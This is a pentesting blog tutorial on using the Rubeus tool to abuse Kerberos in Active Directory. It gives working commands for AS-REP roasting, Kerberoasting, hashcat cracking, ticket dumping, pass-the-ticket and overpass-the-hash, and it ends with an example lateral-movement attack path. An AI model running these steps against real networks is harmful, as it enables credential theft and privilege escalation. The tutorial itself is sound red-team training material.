/ Post-Exploitation, Uncategorized / By

Rubeus for Pentesters:

Introduction

Kerberos is a cornerstone of authentication in modern Windows environments, especially within Active Directory domains. But it’s also full of opportunities for abuse — if you know where to look.

Rubeus is one of the most powerful tools for post-exploitation Kerberos abuse. Written in C#, it allows attackers and red teamers to interact with and manipulate Kerberos tickets, extract credentials, perform various attacks like AS-REP roasting and Kerberoasting, and even inject forged tickets into memory for lateral movement or privilege escalation.

This guide will walk you through exactly what Rubeus does, when to use it, and how it fits into real-world attack paths.

What is Kerberos?

Kerberos is an authentication protocol based on tickets. In AD environments, it enables users and services to prove their identities securely.

At a high level:

  1. The user authenticates to the Key Distribution Center (KDC) and receives a Ticket Granting Ticket (TGT).
  2. The TGT is used to request Service Tickets (TGS) to access specific services.
  3. These tickets are encrypted with secret keys and passed between clients and services.

Kerberos is efficient and secure when configured properly, but several features can be exploited under the right conditions — and that’s where Rubeus comes in.

Why Rubeus Matters in Pentesting

Rubeus is a post-exploitation Swiss Army knife for interacting with Kerberos. Whether you’ve landed on a machine and want to extract tickets or you’re looking to move laterally, escalate privileges, or maintain access — Rubeus can help.

It can be used to:

  • Harvest and crack AS-REP or Kerberoastable hashes
  • Request and inject TGTs or TGS tickets
  • Perform Pass-the-Ticket attacks
  • Forge Golden/Silver tickets
  • Monitor ticket requests in real time

Rubeus operates in-memory and can be obfuscated, making it a common tool in stealthier red team operations.

How to Use Rubeus – Commands and Examples

You typically run Rubeus from an elevated or domain-joined context. Here’s a breakdown of its key functionality.

1. AS-REP Roasting

Targets accounts that do not require Kerberos pre-authentication.

Rubeus.exe asreproast /user:johnny /outfile:johnhash.txt
# Finds users with pre-auth disabled and dumps AS-REP hashes

The output is in Hashcat format and can be cracked offline:

hashcat -m 18200 hash.txt rockyou.txt --force

2. Kerberoasting

Targets service accounts with SPNs registered in AD.

Rubeus.exe kerberoast
# Requests TGS tickets for accounts with SPNs and dumps crackable hashes

You can specify specific users or filters:

Rubeus.exe kerberoast /user:svc_sql /domain:corp.local

Crack with Hashcat using mode 13100.

3. Requesting a TGT with Credentials

Rubeus.exe tgtdeleg /user:alice /password:Password123 /domain:corp.local
# Requests a TGT and stores it in memory

Or export it to a .kirbi file:

Rubeus.exe tgtdeleg /user:alice /password:Password123 /domain:corp.local /outfile:alice_tgt.kirbi

4. Pass-the-Ticket (PTT)

Inject a valid ticket into the current session.

Rubeus.exe ptt /ticket:ticket.kirbi
# Injects the ticket into memory

Useful for lateral movement when reusing a stolen ticket.

5. Dump Tickets from Memory

Rubeus.exe dump
# Dumps all Kerberos tickets from memory

You can save these to disk for reuse or analysis.

6. Renew a TGT

If you have a valid TGT, you can renew it before it expires.

Rubeus.exe renew /ticket:ticket.kirbi
# Renews the TGT using the session key

This helps maintain persistence without re-authenticating.

7. Overpass-the-Hash (Pass-the-Key)

You can request a TGT using just an NTLM hash.

Rubeus.exe asktgt /user:svc_account /rc4:<NTLM_HASH> /domain:corp.local
# Requests a TGT using a hash instead of a password

This is especially useful in hash dumping or NTLM relay scenarios.

8. Monitor Kerberos Activity in Real Time

Rubeus.exe monitor
# Captures and displays real-time Kerberos ticket activity

Great for watching how users and services authenticate — useful for identifying SPNs and targets of interest.

Example Attack Path Using Rubeus

Here’s how you might use Rubeus in a real-world Active Directory attack:

  1. Initial Access: You gain access as a low-privileged domain user.
  2. AS-REP Roasting: Use asreproast to dump and crack a hash for svc_backup.
  3. Login with Password: The cracked password is reused by svc_backup on other machines.
  4. Kerberoasting: svc_backup has rights to request a TGS for MSSQLSvc/sql.corp.local. You dump it.
  5. Crack the TGS hash: You get the service account password and it has local admin rights on a SQL server.
  6. Dump Tickets: From the SQL server, you dump tickets using Rubeus dump.
  7. Reuse TGT: Inject the TGT on your own foothold with ptt.
  8. Lateral Movement: Use the ticket to access another server or dump more hashes.

Rubeus gives you control at every step.

Final Thoughts

Rubeus is an essential tool in any pentester or red teamer’s post-exploitation toolkit. It exposes the depth and nuance of Kerberos, turning what often seems like an opaque protocol into something practical and exploitable.

Once you understand how Kerberos really works, Rubeus becomes more than just a tool — it becomes a roadmap for lateral movement and privilege escalation in Active Directory environments.

Related Posts

Scroll to Top